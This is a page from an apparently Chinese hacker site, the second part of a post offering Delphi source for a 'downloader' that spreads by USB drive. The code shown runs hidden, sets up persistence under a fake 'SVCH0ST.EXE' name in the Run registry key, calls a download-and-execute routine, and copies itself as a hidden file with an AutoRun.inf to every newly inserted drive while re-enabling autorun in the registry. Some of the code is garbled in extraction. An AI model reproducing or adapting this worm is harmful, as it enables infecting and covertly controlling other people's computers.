黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客编程 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]下载者U盘传染源码
      ★★★★★

下载者U盘传染源码

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-12-23 9:54:32

procedure TFrm_Main.WMDeviceChange(var MsgTMessage);
var
     
lpdb PDEV_BROADCAST_HDR
;
     
lpdbv PDEV_BROADCAST_VOLUME
;
     
unitmask:DWORD
;
     
i:integer
;
     
MyIni:TIniFile
;
     
s:Hkey
;
     
value:dword 
;
     
inifile:string
;
begin
     lpdb 
:= PDEV_BROADCAST_HDR(Msg.LParam
);
     case 
Msg.
WParam of
     DBT_DEVICEARRIVAL 
:
//有设备安装完毕


     
if lpdb.dbch_devicetype=
DBT_DEVTYP_VOLUME then
     begin
         lpdbv 
:= PDEV_BROADCAST_VOLUME(lpdb
);
         
unitmask:=lpdbv.dbcv_unitmask;
//取得设备的盘符
         
for i:=0 to 25 do 
//遍历磁盘
         
begin
             
if Boolean(unitmask and $1)then
//看该驱动器的状态是否发生了变化
             
break;
             
unitmask := unitmask shr 1
;
         
end
;
         if 
fileexists(exefullthen     
//向u盘拷文件
         
begin
         copyfile
(PChar(exefull),Pchar(char(i+65) + 
':\' + exefile),false);
         FileSetAttr(char(i+65) + '
:
' + exefile,$00000003);
         end;
         inifile:=char(i+65)+'
:AutoRun.inf
';//ini文件
         RegOpenKeyEx(HKEY_CURRENT_USER, '
SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
', 0, KEY_ALL_ACCESS, s);
         value:=0;
         RegSetValueEx(s,'
NoDriveTypeAutoRun
',0, REG_DWORD,@value, sizeof(value));
         RegCloseKey(s);
         if fileexists(inifile) then
         begin
         FileSetAttr(inifile,$00000000);
         DeleteFile(inifile);
         end;
         MyIni := TIniFile.Create(inifile);
         MyIni.WriteString('
AutoRun', 'open
',exefile);
         FileSetAttr(inifile,$00000003);
     end;
    end;
end;


procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
     Application.ShowMainForm:=False;
     getsystemdirectory(path,120);
     exefull := strpas(path) + '' + exefile;
     size:=256;
     RegOpenKeyEx(HKEY_LOCAL_MACHINE,'
SoftwareMicrosoftWindowsCurrentVersionRun
',0,KEY_ALL_ACCESS,s);
     RegQueryValueEx(s,'
SVCH0ST
',nil,nil,@value,@size);
     RegCloseKey(s);
     //文件存在且有自启动
     if fileexists('
C:WINDOWSsystem32SVCH0ST.EXE
') and (UpperCase(value) = UpperCase(exefull)) then
     messagebox(0,'
自启动成功!','成功'
,MB_OK)
     else
     Startup(exefull);//下载执行函数
end;


procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
     Application.Terminate;
end;


end.

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886